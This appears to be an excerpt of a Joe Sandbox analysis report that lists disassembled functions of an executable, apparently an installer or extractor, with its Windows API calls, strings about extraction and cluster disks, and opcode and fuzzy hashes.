                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterUnhandled
                                                              • String ID:
                                                              • API String ID: 3192549508-0
                                                              • Opcode ID: c8c6e4e88d001d67570e1fb957b30595cf70da34d2f9d2f1e438937091efcf44
                                                              • Instruction ID: e1e2387d30e121235dbe89255ab7363075047b4a20be3ef003642dd5501563f0
                                                              • Opcode Fuzzy Hash: c8c6e4e88d001d67570e1fb957b30595cf70da34d2f9d2f1e438937091efcf44
                                                              • Instruction Fuzzy Hash: F69002E0E752106657001FB07D0D445A5949A69653F4144506605D4094DE7040A05511
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002273D8 Relevance: .5, Instructions: 501COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 61fa99affce33d7875b881edd4fc012b6886ab63d561030901e6a8e22fff4d22
                                                              • Instruction ID: 768f168ce682acf4d3adbbc2176ec25444fc97ca657044f589d23f3bffa377e6
                                                              • Opcode Fuzzy Hash: 61fa99affce33d7875b881edd4fc012b6886ab63d561030901e6a8e22fff4d22
                                                              • Instruction Fuzzy Hash: 4F12A531D18129EFCF08CFA8D5906BCBBB6EF84346F218569D856AB240D7709F91DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00217016 Relevance: 59.8, APIs: 24, Strings: 10, Instructions: 271windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,0000000C,00000000,?), ref: 002171D4
                                                              • SendMessageA.USER32(?,00000028,00000000,00000000), ref: 002171DF
                                                              • GetDlgItem.USER32(?,000003F0), ref: 00217203
                                                              • GetLastError.KERNEL32 ref: 00217210
                                                              • GetDlgItem.USER32(?,000003F0), ref: 002172FD
                                                              • GetLastError.KERNEL32 ref: 00217307
                                                              • SendMessageW.USER32(00000000,0000000C,00000000,?), ref: 00217341
                                                              • SetWindowLongW.USER32(?,000000EB,?), ref: 0021734D
                                                                • Part of subcall function 002187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218802
                                                                • Part of subcall function 002187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218809
                                                              • EndDialog.USER32(00000001,80070642), ref: 0021738C
                                                              Strings
                                                              • Failed to get the text of the label, xrefs: 00217120
                                                              • Call to the SHGetPathFromIDListW failed, xrefs: 00217184
                                                              • Failed to allocate memory for the directory control value, xrefs: 00217289
                                                              • Failed to allocate memory for the title, xrefs: 002170A3
                                                              • Failed to allocate memory for the directory value, xrefs: 00217084
                                                              • Failed to get text from the directory control, xrefs: 002172C6
                                                              • Failed to get the directory control, xrefs: 002171BA, 00217231
                                                              • Failed to get text length from the directory control, xrefs: 0021726D
                                                              • Failed to get the label control, xrefs: 002170E2
                                                              • Failed to get the directory control., xrefs: 00217328
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$ErrorHeapItemLast$AllocDialogLongProcessWindow
                                                              • String ID: Call to the SHGetPathFromIDListW failed$Failed to allocate memory for the directory control value$Failed to allocate memory for the directory value$Failed to allocate memory for the title$Failed to get text from the directory control$Failed to get text length from the directory control$Failed to get the directory control$Failed to get the directory control.$Failed to get the label control$Failed to get the text of the label
                                                              • API String ID: 2993860606-745645607
                                                              • Opcode ID: fbc44d2f87c11207982dabf7fc1f8aa68c56453414d071725443bb54c7d79477
                                                              • Instruction ID: 15016239187b6d3a8fd5a75c8562de2cd17f80a38bdea59ad04a834f2a4ea3d8
                                                              • Opcode Fuzzy Hash: fbc44d2f87c11207982dabf7fc1f8aa68c56453414d071725443bb54c7d79477
                                                              • Instruction Fuzzy Hash: 2F91B236D68226ABDB205FA49C48BDD7AF0AB74310F168174FE05BB290D6758DE09A90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0022A919 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,002290DE), ref: 0022A921
                                                              • __mtterm.LIBCMT ref: 0022A92D
                                                                • Part of subcall function 0022A5DA: _DecodePointerInternal@4.G5K9HNJ7(00000005,0022AA8F,?,002290DE), ref: 0022A5EB
                                                                • Part of subcall function 0022A5DA: TlsFree.KERNEL32(0000000E,0022AA8F,?,002290DE), ref: 0022A605
                                                                • Part of subcall function 0022A5DA: DeleteCriticalSection.KERNEL32(00000000,00000000,0021B4F9,?,0022AA8F,?,002290DE), ref: 0022D09B
                                                                • Part of subcall function 0022A5DA: _free.LIBCMT ref: 0022D09E
                                                                • Part of subcall function 0022A5DA: DeleteCriticalSection.KERNEL32(0000000E,0021B4F9,?,0022AA8F,?,002290DE), ref: 0022D0C5
                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0022A943
                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0022A950
                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0022A95D
                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0022A96A
                                                              • TlsAlloc.KERNEL32(?,002290DE), ref: 0022A9BA
                                                              • TlsSetValue.KERNEL32(00000000,?,002290DE), ref: 0022A9D5
                                                              • __init_pointers.LIBCMT ref: 0022A9DF
                                                              • _EncodePointerInternal@4.G5K9HNJ7(?,002290DE), ref: 0022A9F0
                                                              • _EncodePointerInternal@4.G5K9HNJ7(?,002290DE), ref: 0022A9FD
                                                              • _EncodePointerInternal@4.G5K9HNJ7(?,002290DE), ref: 0022AA0A
                                                              • _EncodePointerInternal@4.G5K9HNJ7(?,002290DE), ref: 0022AA17
                                                              • _DecodePointerInternal@4.G5K9HNJ7(Function_0001A772,?,002290DE), ref: 0022AA38
                                                              • __calloc_crt.LIBCMT ref: 0022AA4D
                                                              • _DecodePointerInternal@4.G5K9HNJ7(00000000,?,002290DE), ref: 0022AA67
                                                              • GetCurrentThreadId.KERNEL32 ref: 0022AA79
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Internal@4Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                              • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                              • API String ID: 1131704290-3819984048
                                                              • Opcode ID: f648e5b7e7890916c40a977a3089b2dc448818eff3d6021dedd1c4fab21fb6e1
                                                              • Instruction ID: b92e5418a5741ed773ec4f1898f4706b376f12f69e830866b3162760bd21a678
                                                              • Opcode Fuzzy Hash: f648e5b7e7890916c40a977a3089b2dc448818eff3d6021dedd1c4fab21fb6e1
                                                              • Instruction Fuzzy Hash: C9317231922222AFD762AFB5BC0E75A3FB1FB59360701552AE718C36B0DB708461CF81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00216C5C Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 242stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCommandLineW.KERNEL32(?,00000000,0023BEF0), ref: 00216C76
                                                              • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00216C84
                                                              • GetLastError.KERNEL32 ref: 00216C91
                                                              • lstrlenW.KERNEL32(00000001), ref: 00216CF6
                                                              • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000002,00213E10,000000FF), ref: 00216D13
                                                              • lstrlenW.KERNEL32(?), ref: 00216D40
                                                              • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000002,00213E34,000000FF), ref: 00216D5D
                                                              • lstrlenW.KERNEL32(?), ref: 00216D90
                                                              • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000002,00213E64,000000FF), ref: 00216DAD
                                                              • lstrlenW.KERNEL32(?), ref: 00216DDD
                                                              • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000001,00213E6C,000000FF), ref: 00216DF9
                                                              • LocalFree.KERNEL32(?), ref: 00216EE1
                                                              Strings
                                                              • Failed to allocate extract directory, xrefs: 00216D84
                                                              • Failed to get command line., xrefs: 00216CB2
                                                              • Failed to allocate box path, xrefs: 00216D34
                                                              • Failed to allocate log, xrefs: 00216DD1
                                                              • Failed to get path to executable., xrefs: 00216E85
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CompareStringlstrlen$CommandLine$ArgvErrorFreeLastLocal
                                                              • String ID: Failed to allocate box path$Failed to allocate extract directory$Failed to allocate log$Failed to get command line.$Failed to get path to executable.
                                                              • API String ID: 881607980-1268566871
                                                              • Opcode ID: 51891aa1df21ba808e5bd4a0238500105f5a46ddd856808e80a3b037bb6c5f33
                                                              • Instruction ID: 6fcaf42c43ede4dc1d3a854fc824b6935f37bed2963dff5a1d731222255186fe
                                                              • Opcode Fuzzy Hash: 51891aa1df21ba808e5bd4a0238500105f5a46ddd856808e80a3b037bb6c5f33
                                                              • Instruction Fuzzy Hash: BD71D779E20216ABDB209F54DC89EEE76E6EF35720F214615F941E7280D630DDE1CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00217EE0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 134memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 002187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218802
                                                                • Part of subcall function 002187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218809
                                                              • GetProcessHeap.KERNEL32(00000000,?,?,01000191,?,0100002D,?,00000000,00000000,00000000,?,?,?,?,00217DDD,00000000), ref: 00218016
                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00217DDD,00000000,00000000,?,?,?,00217780,?,00000000,00000000,0023BEF0), ref: 00218019
                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,01000191,?,0100002D,?,00000000,00000000,00000000), ref: 0021802F
                                                              • HeapFree.KERNEL32(00000000), ref: 00218032
                                                              Strings
                                                              • Failed to get the cluster property CLUSCTL_RESOURCE_GET_RESOURCE_TYPE, xrefs: 00217F34
                                                              • Ignoring cluster resource as it's not a Physical Disk, xrefs: 00217F5D
                                                              • Failed to get the cluster property CLUSCTL_RESOURCE_STORAGE_GET_DISK_INFO, xrefs: 00217F87
                                                              • Ignoring the partition '%S' because it doesn't look like a DOS name, xrefs: 00217FBD
                                                              • Found a partition on cluster resource: '%S', xrefs: 00217FA7
                                                              • Failed to allocate an empty drive map, xrefs: 00217F0A
                                                              • Cluster resource type: '%S', xrefs: 00217F3E
                                                              • Physical Disk, xrefs: 00217F49
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$Free$Alloc
                                                              • String ID: Cluster resource type: '%S'$Failed to allocate an empty drive map$Failed to get the cluster property CLUSCTL_RESOURCE_GET_RESOURCE_TYPE$Failed to get the cluster property CLUSCTL_RESOURCE_STORAGE_GET_DISK_INFO$Found a partition on cluster resource: '%S'$Ignoring cluster resource as it's not a Physical Disk$Ignoring the partition '%S' because it doesn't look like a DOS name$Physical Disk
                                                              • API String ID: 3689955550-1827234441
                                                              • Opcode ID: 81167cc28c28823af27056e94acc2aaeb9f9d06ef7007a2fdee9a861fc153e87
                                                              • Instruction ID: 9a17a37b97f8b31f92477ddfe2498a95b922dbb856ea4e839d153393cf44b67f
                                                              • Opcode Fuzzy Hash: 81167cc28c28823af27056e94acc2aaeb9f9d06ef7007a2fdee9a861fc153e87
                                                              • Instruction Fuzzy Hash: 01419F7196820AFACB11EFA08C869EFBBF9EFB4340F214419F505A2141DB705AE6CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021ADE5 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 188fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 002184C7: GetLocalTime.KERNEL32(?,?,00000000), ref: 002184E2
                                                                • Part of subcall function 002184C7: swprintf.LIBCMT ref: 00218513
                                                              • GetLastError.KERNEL32(?,40000000,00000005,00000002,08000080,?,00000000,?,?,00000000,000000FF), ref: 0021AEA7
                                                              • SetEndOfFile.KERNEL32(?,00000000,?,?,?,40000000,00000005,00000002,08000080,?,00000000,?,?,00000000,000000FF), ref: 0021AEED
                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0021AF04
                                                              • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 0021AF7C
                                                              • CloseHandle.KERNEL32(?,00000000,?,?,?,40000000,00000005,00000002,08000080,?,00000000,?,?,00000000,000000FF), ref: 0021B02C
                                                              • GetLastError.KERNEL32 ref: 0021B057
                                                                • Part of subcall function 00219B6A: SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0021A52C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00219B82
                                                                • Part of subcall function 00219B6A: GetLastError.KERNEL32(?,?,?,0021A52C,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 00219B8C
                                                              Strings
                                                              • Extracting file: %ws, xrefs: 0021AE06
                                                              • User canceled extraction..., xrefs: 0021B019
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: File$ErrorLast$Pointer$CloseHandleLocalReadTimeswprintf
                                                              • String ID: Extracting file: %ws$User canceled extraction...
                                                              • API String ID: 1889754113-1866894759
                                                              • Opcode ID: 80e03d7941ffbaadc203a1ccbd992afa8623ec64eb9e6b2c9c79c0d376ecde45
                                                              • Instruction ID: e9e8004e4d0d558368e539bb2877f4722acd6e26d27d0d21e84f7ba3c94928ae
                                                              • Opcode Fuzzy Hash: 80e03d7941ffbaadc203a1ccbd992afa8623ec64eb9e6b2c9c79c0d376ecde45
                                                              • Instruction Fuzzy Hash: 4F617170A202199FCB329F64DCC9FEEB6F5AB6C700F104594F29996151D6B2DAE09F20
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 002188ED Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,6D824150,00000024,?,00000000,00000000), ref: 00218930
                                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,0021A366,?,?,?), ref: 00218957
                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0021A366,?,?,?,00000000,000000FF), ref: 0021895E
                                                                • Part of subcall function 00219A43: GetProcessHeap.KERNEL32(00000000,?,?,00218CCC,?,?,00000000), ref: 00219A4D
                                                                • Part of subcall function 00219A43: HeapSize.KERNEL32(00000000,?,00218CCC,?,?,00000000), ref: 00219A54
                                                              • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,0021A366,?,?,?,00000000), ref: 00218968
                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0021A366,?,?,?,00000000,000000FF), ref: 0021896F
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000000,00000000,00000000), ref: 00218992
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0021A366,?,?,?,00000000,000000FF), ref: 00218998
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocByteCharMultiWide$ErrorLastSize
                                                              • String ID: W
                                                              • API String ID: 3423999398-655174618
                                                              • Opcode ID: 2a78cd17759c6bc54063a571b3f199275d7823eadb8089079f460719521a3c5e
                                                              • Instruction ID: 53ee8ddc967f31ad08ca16db883d8326a3b4bfc920804a1f3d13df8dca911c18
                                                              • Opcode Fuzzy Hash: 2a78cd17759c6bc54063a571b3f199275d7823eadb8089079f460719521a3c5e
                                                              • Instruction Fuzzy Hash: 522193B1810109FFCB109FA49CC49FDBBF8EF25354F308669E251E7290CA358E909B11
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00218254 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 95memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,?,00217F2D,?,0100002D,?,00000000,00000000,00000000), ref: 002182AB
                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,00217F2D,?,0100002D,?,00000000,00000000,00000000,?,?,?,?,00217DDD), ref: 002182B2
                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00217F2D,?,0100002D,?,00000000,00000000,00000000), ref: 0021831C
                                                              • HeapFree.KERNEL32(00000000,?,?,?,00217F2D,?,0100002D,?,00000000,00000000,00000000,?,?,?,?,00217DDD), ref: 00218323
                                                              Strings
                                                              • Failed to retrieve the the cluster resource property value, xrefs: 00218300
                                                              • Failed to allocate memory for the cluster resource property buffer, xrefs: 002182C3
                                                              • Failed to retrieve the size from the cluster resource property buffer, xrefs: 00218293
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID: Failed to allocate memory for the cluster resource property buffer$Failed to retrieve the size from the cluster resource property buffer$Failed to retrieve the the cluster resource property value
                                                              • API String ID: 756756679-2748719997
                                                              • Opcode ID: cec8b6a9a072f128e9a3504a694f16f79e057fb5f88766d2f0a2428844f2f13e
                                                              • Instruction ID: 45b4fc76f65322ad8ddc5d2622accb9c7ec41d0ecb6b2ca620f301b42c34f84a
                                                              • Opcode Fuzzy Hash: cec8b6a9a072f128e9a3504a694f16f79e057fb5f88766d2f0a2428844f2f13e
                                                              • Instruction Fuzzy Hash: 8B219F72921115BFDB125FA1ED8DDEF7FE8EF65B60B204065F908D2140DE348AE09AA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0023168A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • _malloc.LIBCMT ref: 00231698
                                                                • Part of subcall function 0022CDB5: __FF_MSGBANNER.LIBCMT ref: 0022CDCE
                                                                • Part of subcall function 0022CDB5: __NMSG_WRITE.LIBCMT ref: 0022CDD5
                                                                • Part of subcall function 0022CDB5: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0022DBEB,?,00000001,?,?,0022D143,00000018,00236FA0,0000000C,0022D1D8), ref: 0022CDFA
                                                              • _free.LIBCMT ref: 002316AB
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free_malloc
                                                              • String ID: ;n#
                                                              • API String ID: 1020059152-2389107768
                                                              • Opcode ID: beebed438a1e743bd570a2172a232a34c60ebee863eddc0d3a4e8fce9daf58cb
                                                              • Instruction ID: e2b843c76445f6868fb9b28d6fdcb70ec391c7322c1d935ef6eba4073346c0f6
                                                              • Opcode Fuzzy Hash: beebed438a1e743bd570a2172a232a34c60ebee863eddc0d3a4e8fce9daf58cb
                                                              • Instruction Fuzzy Hash: 6A11EB72831221BACB322FF4BC0A79A3758AF443A1F298526F9589B150DF30C8709F94
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0022A61C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00236E90,00000008,0022A729,00000000,00000000,?,0022DBEB,?,00000001,?,?,0022D143,00000018,00236FA0,0000000C), ref: 0022A62D
                                                              • __lock.LIBCMT ref: 0022A661
                                                                • Part of subcall function 0022D1BD: __mtinitlocknum.LIBCMT ref: 0022D1D3
                                                                • Part of subcall function 0022D1BD: __amsg_exit.LIBCMT ref: 0022D1DF
                                                                • Part of subcall function 0022D1BD: EnterCriticalSection.KERNEL32(?,?,?,0022A803,0000000D,00236EB8,00000008,002337A4,?,00000000), ref: 0022D1E7
                                                              • InterlockedIncrement.KERNEL32(0023A448), ref: 0022A66E
                                                              • __lock.LIBCMT ref: 0022A682
                                                              • ___addlocaleref.LIBCMT ref: 0022A6A0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                              • String ID: KERNEL32.DLL
                                                              • API String ID: 637971194-2576044830
                                                              • Opcode ID: 9f2e3cc728632545f77aa028abec29aedc3ebddc257bd3ee61544eb82824a2d9
                                                              • Instruction ID: f881ac98ced236f24e99c070ba5d3e9709a85f0d3b3dff32b948077c2b24650c
                                                              • Opcode Fuzzy Hash: 9f2e3cc728632545f77aa028abec29aedc3ebddc257bd3ee61544eb82824a2d9
                                                              • Instruction Fuzzy Hash: 7A018471451710FFD720EFA5E80A749FBE1BF10314F10890DE5AA56BA0CBB4A664CF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00234FC1 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __getptd.LIBCMT ref: 00234FE2
                                                                • Part of subcall function 0022A753: __getptd_noexit.LIBCMT ref: 0022A756
                                                                • Part of subcall function 0022A753: __amsg_exit.LIBCMT ref: 0022A763
                                                              • __getptd.LIBCMT ref: 00234FF3
                                                              • __getptd.LIBCMT ref: 00235001
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                              • String ID: MOC$RCC$csm
                                                              • API String ID: 803148776-2671469338
                                                              • Opcode ID: 8c2ebab0d2ed4d0fea42efe5ed5d7f483909f0bfe9a5f0ac829d02d42dc837ac
                                                              • Instruction ID: 244c17d2c3bef397f002b1c9d4bf78bfbcfabb9da651ca3056efa24d00f67225
                                                              • Opcode Fuzzy Hash: 8c2ebab0d2ed4d0fea42efe5ed5d7f483909f0bfe9a5f0ac829d02d42dc837ac
                                                              • Instruction Fuzzy Hash: 1EE01A711342149FC724AFA8D04AB6C73A4FF88314F6945E2E80CCB622C738E8708987
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00235296 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • __CreateFrameInfo.LIBCMT ref: 002352BE
                                                                • Part of subcall function 00234CDB: __getptd.LIBCMT ref: 00234CE9
                                                                • Part of subcall function 00234CDB: __getptd.LIBCMT ref: 00234CF7
                                                              • __getptd.LIBCMT ref: 002352C8
